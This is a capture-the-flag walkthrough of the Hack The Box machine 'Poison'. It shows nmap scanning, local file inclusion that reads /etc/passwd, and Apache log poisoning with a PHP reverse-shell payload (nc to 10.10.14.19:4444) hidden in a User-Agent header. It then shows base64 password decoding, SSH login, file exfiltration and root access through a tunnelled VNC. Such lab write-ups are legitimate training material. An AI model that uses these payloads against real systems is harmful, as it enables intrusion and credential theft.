Poison
Enumeration
As usual, we start with an nmap scan, in order to find open ports in the target machine.
The following nmap command will scan the target machine looking for open ports quickly and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.84 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Tue Mar 22 20:00:10 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.84
Warning: 10.10.10.84 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.84
Host is up (0.060s latency).
Not shown: 58441 filtered tcp ports (no-response), 7092 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# Nmap done at Tue Mar 22 20:00:49 2022 -- 1 IP address (1 host up) scanned in 38.45 secondsAs we see, there are a few ports open.
Let's try to obtain the services and versions of these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,80 10.10.10.84 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Tue Mar 22 20:01:39 2022 as: nmap -sCV -p22,80 -oN targeted 10.10.10.84
Nmap scan report for 10.10.10.84
Host is up (0.044s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 22 20:01:48 2022 -- 1 IP address (1 host up) scanned in 9.31 secondsLet's take a look at the website.
If we put some of the .php files listed into the scriptname text field, and hit the Submit button, it will look like it is showing us the file.
Exploitation
We could try to do a Local File Inclusion (LFI) attack. If we put the /etc/passwd file, and hit Submit, we'll see that we can see the /etc/passwd file of the Poison machine, and we could also see that there are two users, the root user and the charix user.
curl -s 'http://10.10.10.84/browse.php?file=/etc/passwd'
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/cshAs nmap reported that the website is hosted by an Apache server, we could try to enumerate the Apache log file.
curl -s 'http://10.10.10.84/browse.php?file=/var/log/httpd-access.log'
192.168.253.133 - - [24/Jan/2018:18:33:25 +0100] "GET / HTTP/1.1" 200 289 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.0" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.0" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "POST /sdk HTTP/1.1" 404 201 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET /nmaplowercheck1521462526 HTTP/1.1" 404 222 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.1" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET /HNAP1 HTTP/1.1" 404 203 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.19 - - [23/Mar/2022:19:44:25 +0100] "GET / HTTP/1.1" 200 289 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.87 Safari/537.36"
10.10.14.19 - - [23/Mar/2022:19:44:26 +0100] "GET /favicon.ico HTTP/1.1" 404 209 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.87 Safari/537.36"
10.10.14.19 - - [23/Mar/2022:19:45:24 +0100] "GET /browse.php?file=ini.php HTTP/1.1" 200 20456 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.87 Safari/537.36"
10.10.14.19 - - [23/Mar/2022:19:50:58 +0100] "GET /browse.php?file=/etc/passwd HTTP/1.1" 200 1894 "-" "curl/7.81.0"
10.10.14.19 - - [23/Mar/2022:19:54:13 +0100] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 1610 "-" "curl/7.81.0"The httpd-access.log file stores every request the server gets with information such us the IP address, the directory, the status code, the user agent, etc...
We could try to make a request to the HTTP server with a User-Agent header, which can contain PHP code that sends us back a reverse shell, so when we access the httpd-access.log file, the PHP code will be interpreted, and we'll get a reverse shell.
curl -s 'http://10.10.10.84/' -A "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.19 4444 >/tmp/f') ?>"
Now the request is stored in the httpd-access.log log file. Before accessing it, let's set a netcat listener on port 4444.
nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
If we now access the log file with the browser, we should catch the reverse shell on the netcat listener.
http://10.10.10.84/browse.php?file=/var/log/httpd-access.log
listening on [any] 4444 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.84] 57237
sh: can't access tty; job control turned off
$ whoami
wwwPrivilege Escalation
If we list the current directory, we'll see the pwdbackup.txt file.
ls -l
-rw-r--r-- 1 root wheel 33 Jan 24 2018 browse.php
-rw-r--r-- 1 root wheel 289 Jan 24 2018 index.php
-rw-r--r-- 1 root wheel 27 Jan 24 2018 info.php
-rw-r--r-- 1 root wheel 33 Jan 24 2018 ini.php
-rw-r--r-- 1 root wheel 90 Jan 24 2018 listfiles.php
-rw-r--r-- 1 root wheel 20 Jan 24 2018 phpinfo.php
-rw-r--r-- 1 root wheel 1267 Mar 19 2018 pwdbackup.txtIf we take a look at it, we'll see a long base64 string.
cat pwdbackup.txt
This password is secure, it's encoded atleast 13 times.. what could go wrong really..
Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=We can decode it, by putting the base64 string in the pwd64 file and executing the following command.
data=$(cat pwdB64); for i in $(seq 1 13); do data=$(echo $data | tr -d ' ' | base64 -d); done; echo $data
Charix!2#4%6&8(0And we get a password. If we try to log in as the user charix with that password via SSH, we'll get in, and we could grab the user flag.
sshpass -p 'Charix!2#4%6&8(0' ssh charix@10.10.10.84
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017
Welcome to FreeBSD!
Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories: https://www.FreeBSD.org/security/
FreeBSD Handbook: https://www.FreeBSD.org/handbook/
FreeBSD FAQ: https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums: https://forums.FreeBSD.org/
Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with: pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.
Show the version of FreeBSD installed: freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages: man man
FreeBSD directory layout: man hier
Edit /etc/motd to change this login announcement.
The default editor in FreeBSD is vi, which is efficient to use when you have
learned it, but somewhat user-unfriendly. To use ee (an easier but less
powerful editor) instead, set the environment variable EDITOR to /usr/bin/ee
charix@Poison:~ % whoami
charix
charix@Poison:~ % cat user.txt
eaacdfb2d141b72a589233063604209cIf we list the current directory, we'll see the secret.zip file.
ls -l
total 8
-rw-r----- 1 root charix 166 Mar 19 2018 secret.zip
-rw-r----- 1 root charix 33 Mar 19 2018 user.txtLet's transfer it to our local machine.
python -m SimpleHTTPServer
On our local machine.
wget http://10.10.10.84:8000/secret.zip
--2022-03-23 20:26:50-- http://10.10.10.84:8000/secret.zip
Connecting to 10.10.10.84:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 166 [application/zip]
Saving to: ‘secret.zip’
secret.zip 100%[===================================================================>] 166 --.-KB/s in 0s
2022-03-23 20:26:50 (23.3 MB/s) - ‘secret.zip’ saved [166/166]If we try to unzip it, it will ask for a password. Let's try the one we found earlier.
unzip secret.zip
Archive: secret.zip
[secret.zip] secret password: Charix!2#4%6&8(0
extracting: secretAnd we get the secret file, which hash some weird content in it.
file secret
secret: Non-ISO extended-ASCII text, with no line terminatorsIf we keep enumerating the machine, we'll see that it is listening on a few ports we didn't see with nmap.
netstat -anp tcp
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 0 10.10.10.84.22 10.10.14.19.34178 ESTABLISHED
tcp4 0 0 10.10.10.84.80 10.10.14.19.46694 FIN_WAIT_2
tcp4 0 0 127.0.0.1.25 *.* LISTEN
tcp4 0 0 *.80 *.* LISTEN
tcp6 0 0 *.80 *.* LISTEN
tcp4 0 0 *.22 *.* LISTEN
tcp6 0 0 *.22 *.* LISTEN
tcp4 0 0 127.0.0.1.5801 *.* LISTEN
tcp4 0 0 127.0.0.1.5901 *.* LISTENWe see the ports 5801 and 5901, which belong to VNC.
We can enumerate the VNC service with the vncviewer tool on our local machine. So let's tunnel that port to our local machine with SSH.
sshpass -p 'Charix!2#4%6&8(0' ssh charix@10.10.10.84 -L 5901:127.0.0.1:5901
Now we can enumerate the VNC service of the victim, through our 5901 port. The vncviewer tool has an option which allow us to authenticate with a password file. If we use the secret file that we have, we'll get a shell as the root user, and all we had to do is reap the harvest and take the root flag.
vncviewer 127.0.0.1:5901 -passwd secret
Last updated
Was this helpful?